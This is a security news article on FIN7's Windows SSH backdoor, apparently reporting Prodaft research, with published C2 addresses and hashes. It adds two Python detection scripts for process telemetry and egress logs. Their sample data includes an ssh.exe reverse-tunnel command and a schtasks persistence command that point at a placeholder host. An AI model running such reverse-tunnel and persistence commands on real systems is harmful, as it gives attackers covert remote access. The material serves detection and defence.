
Recent findings from Prodaft reveal that the group’s latest campaign again leverages a customized OpenSSH toolset and an installation script named install.bat to establish encrypted remote access channels and facilitate data exfiltration.
The toolset effectively turns Windows systems into SSH clients capable of initiating outbound reverse tunnels to attacker-controlled servers, thereby bypassing inbound firewall restrictions.
Once active, the malware enables secure SFTP sessions used for stealthy data transfer and continuous operator control. Researchers emphasize that the modular and legitimate appearance of the OpenSSH components makes detection challenging, as they mimic harmless administrative utilities.
Reverse Tunneling and Persistence Techniques
The attack chain begins with the deployment of a self-contained ZIP archive that bundles portable OpenSSH binaries, configuration files, and the batch installer script.
When executed, install.bat automatically extracts the package to an inconspicuous directory, typically within the Windows ProgramData or Temp folder. It then sets up persistence so the backdoor survives reboots, registering it through system startup entries or scheduled tasks.

FIN7’s backdoor establishes a reverse SSH connection to predetermined command-and-control endpoints, encrypting traffic to disguise it as ordinary administrative activity.
This reverse connection model grants attackers full command-line access to infected hosts while allowing them to proxy communications through intermediate nodes.
Analysts note that the simplicity of the approach, using mature SSH utilities rather than custom binaries, reduces the operational footprint and limits forensic traces.
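The behaviours described in this section (OpenSSH client binaries dropped under ProgramData or Temp, a reverse port-forward to an external host, and a scheduled task or Run key that points at the dropped binary) are all visible in ordinary process-creation telemetry. The following is an added detection example, not code from Prodaft or the article: it runs those heuristics over constructed Sysmon-style process-creation records. The field names (Image, CommandLine, ParentImage) follow Sysmon Event ID 1; the sample events, paths and the 203.0.113.10 address are constructed for illustration.

```python
"""Behavioural detection for a portable-OpenSSH reverse-tunnel backdoor on Windows.

Added example, not from the Prodaft report or the article. The heuristics are:
  * an OpenSSH binary executing from a drop directory (ProgramData / Temp),
  * ssh.exe invoked with -R, OpenSSH's reverse (remote) port-forward option,
  * schtasks.exe /create or a reg.exe Run-key write whose payload names an SSH binary.
Input records are dicts shaped like Sysmon Event ID 1 (assumption; adapt to your source).
"""
import re
from dataclasses import dataclass

SSH_BINARIES = {"ssh.exe", "sftp.exe", "scp.exe", "sshd.exe"}
# Drop locations the article names, lowercased with backslashes.
SUSPECT_DIRS = ("c:\\programdata\\", "c:\\windows\\temp\\", "\\appdata\\local\\temp\\")
# -R [bind:]port:host:hostport is the OpenSSH reverse-forward syntax.
REVERSE_FORWARD = re.compile(r"(?:^|\s)-R\s*\S+")


@dataclass
class Finding:
    rule: str
    image: str
    command_line: str


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _in_suspect_dir(path):
    p = path.replace("/", "\\").lower()
    return any(d in p for d in SUSPECT_DIRS)


def _mentions_ssh_binary(text):
    t = text.lower()
    return any(b in t for b in SSH_BINARIES)


def analyse_process_events(events):
    """Return a list of Finding objects, one per matched rule, in event order."""
    findings = []
    for ev in events:
        image = ev.get("Image", "")
        cmd = ev.get("CommandLine", "")
        name = _basename(image)
        if name in SSH_BINARIES and _in_suspect_dir(image):
            findings.append(Finding("ssh-binary-in-drop-dir", image, cmd))
        if name == "ssh.exe" and REVERSE_FORWARD.search(cmd):
            findings.append(Finding("ssh-reverse-forward", image, cmd))
        # Persistence via scheduled task whose action runs an SSH binary.
        if name == "schtasks.exe" and "/create" in cmd.lower() and _mentions_ssh_binary(cmd):
            findings.append(Finding("schtasks-persists-ssh", image, cmd))
        # Persistence via HKCU/HKLM ...\Run value pointing at an SSH binary.
        if name == "reg.exe" and "\\run" in cmd.lower() and _mentions_ssh_binary(cmd):
            findings.append(Finding("runkey-persists-ssh", image, cmd))
    return findings


# Constructed sample telemetry (not real events). The first record is a legitimate
# admin session from the in-box OpenSSH client and must produce no finding.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh.exe admin@jump.corp.example",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\ProgramData\ssh\ssh.exe",
     "CommandLine": r"ssh.exe -N -R 2222:localhost:22 -i C:\ProgramData\ssh\key svc@203.0.113.10",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /tn "OpenSSH Update" /sc onstart /tr "C:\ProgramData\ssh\ssh.exe -N -R 2222:localhost:22 svc@203.0.113.10"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for f in analyse_process_events(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.image}\n    {f.command_line}")
```

The first rule is the strongest signal on its own: Windows ships OpenSSH under System32\OpenSSH, so an ssh.exe anywhere under ProgramData or a Temp folder is worth a look regardless of its arguments. The -R rule also fires for legitimate reverse forwards by administrators, so it is best treated as a hunting lead and tuned against an allowlist of known jump hosts.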
Indicators and Infrastructure
Prodaft’s technical analysis identified multiple active command-and-control IP addresses tied to Savage Ladybug’s latest wave of activity, including 193.233.205.55, 207.90.237.140, 166.88.159.175, and 5.181.159.118, among others.
The primary delivery infrastructure was traced to 194.87.39.183, hosting ZIP packages and configuration archives.
Associated file hashes include several variants of the installer and configuration sets, such as 6125dd568bad941f51594004a00da31d4a2120ce86ad54b18916c335df2e97db and a29bdd1745b827d672f1de43f3105bd3841d673cc27cc8737944eb1d1750db2b.
These artifacts align with the previously documented FIN7 intrusion toolkit, showing high consistency in operational methods across campaigns.
Security analysts assess that the continued use of this SSH-based backdoor underscores FIN7’s confidence in its stealth and persistence capabilities.
By embedding legitimate open-source components and relying on outbound encrypted connections, the group effectively evades conventional detection while maintaining durable access to compromised enterprise systems.
Indicators of Compromise (IOC)
C2 Servers
193.233.205.55
207.90.237.140
166.88.159.175
5.181.159.118
166.88.159.181
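The addresses and hashes above are only useful once they are matched against something. As an added example (not code from Prodaft or the article), the block below parses constructed egress-firewall log lines, flags any connection to the published C2 or delivery addresses, and separately flags outbound SSH on TCP/22 to a public host that is not an approved peer; a small hash matcher covers the installer SHA-256 values. The log format, the ALLOWED_SSH_PEERS value, the 198.51.100.7 and 203.0.113.88 addresses and the sample file paths are all assumptions.

```python
"""IOC and egress matching for the FIN7 SSH-backdoor campaign described above.

Added example, not from Prodaft or the article. The log-line format is an
assumption (key=value pairs); adapt LOG_RE to your own firewall or proxy source.
The tunnel need not use port 22, so the IOC rule is the reliable one and the
port-22 rule is a low-cost hunting heuristic.
"""
import ipaddress
import re

# C2 addresses as published in the article (the report notes "among others").
C2_SERVERS = {
    "193.233.205.55", "207.90.237.140", "166.88.159.175",
    "5.181.159.118", "166.88.159.181",
}
# Delivery host that served the ZIP packages, from the article.
DELIVERY_HOSTS = {"194.87.39.183"}
# SHA-256 values of installer/configuration variants, from the article.
KNOWN_SHA256 = {
    "6125dd568bad941f51594004a00da31d4a2120ce86ad54b18916c335df2e97db",
    "a29bdd1745b827d672f1de43f3105bd3841d673cc27cc8737944eb1d1750db2b",
}
# Assumed: jump hosts your administrators legitimately SSH to (constructed value).
ALLOWED_SSH_PEERS = {"203.0.113.88"}
# Explicit internal ranges. ipaddress.is_global treats documentation ranges
# (198.51.100.0/24 etc.) as non-global, so an explicit list is used instead.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

LOG_RE = re.compile(
    r"host=(?P<host>\S+)\s+proto=(?P<proto>\w+)\s+"
    r"src=(?P<src>[\d.]+):(?P<sport>\d+)\s+dst=(?P<dst>[\d.]+):(?P<dport>\d+)"
)


def parse_line(line):
    m = LOG_RE.search(line)
    return m.groupdict() if m else None


def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def classify(rec):
    """Return an alert name for one parsed record, or None."""
    dst = rec["dst"]
    if dst in C2_SERVERS or dst in DELIVERY_HOSTS:
        return "known-ioc"
    if rec["proto"] == "tcp" and rec["dport"] == "22":
        if not is_internal(dst) and dst not in ALLOWED_SSH_PEERS:
            return "unexpected-outbound-ssh"
    return None


def scan_egress_log(lines):
    """Return ([(host, rule, dst), ...], number_of_unparseable_lines)."""
    alerts, skipped = [], 0
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            skipped += 1
            continue
        rule = classify(rec)
        if rule:
            alerts.append((rec["host"], rule, rec["dst"]))
    return alerts, skipped


def match_hashes(observed):
    """observed: mapping path -> sha256 hex. Returns paths whose hash is a known IOC."""
    return sorted(p for p, h in observed.items() if h.lower() in KNOWN_SHA256)


# Constructed sample log lines (not real traffic). The last line is a non-egress
# record and exercises the skip path.
SAMPLE_LOG = [
    "2025-10-02T10:15:03Z host=WS-0142 proto=tcp src=10.20.3.15:51002 dst=193.233.205.55:443 action=allow",
    "2025-10-02T10:15:09Z host=WS-0142 proto=tcp src=10.20.3.15:51010 dst=10.20.0.5:22 action=allow",
    "2025-10-02T10:16:41Z host=SRV-07 proto=tcp src=10.20.7.2:44120 dst=198.51.100.7:22 action=allow",
    "2025-10-02T10:16:55Z host=SRV-07 proto=tcp src=10.20.7.2:44131 dst=203.0.113.88:22 action=allow",
    "2025-10-02T10:17:02Z host=WS-0199 proto=udp src=10.20.3.40:53011 dst=10.20.0.1:53 action=allow",
    "2025-10-02T10:17:30Z host=WS-0199 kernel: link up",
]
# Constructed path -> hash observations; the first value is one of the published hashes.
SAMPLE_HASHES = {
    r"C:\Users\Public\pkg.zip": "6125dd568bad941f51594004a00da31d4a2120ce86ad54b18916c335df2e97db",
    r"C:\Windows\System32\OpenSSH\ssh.exe": "0000000000000000000000000000000000000000000000000000000000000000",
}

if __name__ == "__main__":
    alerts, skipped = scan_egress_log(SAMPLE_LOG)
    for host, rule, dst in alerts:
        print(f"{host}: {rule} -> {dst}")
    print(f"skipped {skipped} unparseable line(s); hash hits: {match_hashes(SAMPLE_HASHES)}")
```

Note that the first sample connection is flagged on the destination address even though it uses port 443: because the operators wrap the tunnel in ordinary SSH encryption and can choose any port, matching on the published infrastructure catches what a port-based rule would miss, while the port-22 heuristic catches tunnels to infrastructure that has not been published yet.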
The post FIN7 Deploys Windows SSH Backdoor for Covert Remote Access and Long-Term Persistence appeared first on Cyber Security News.
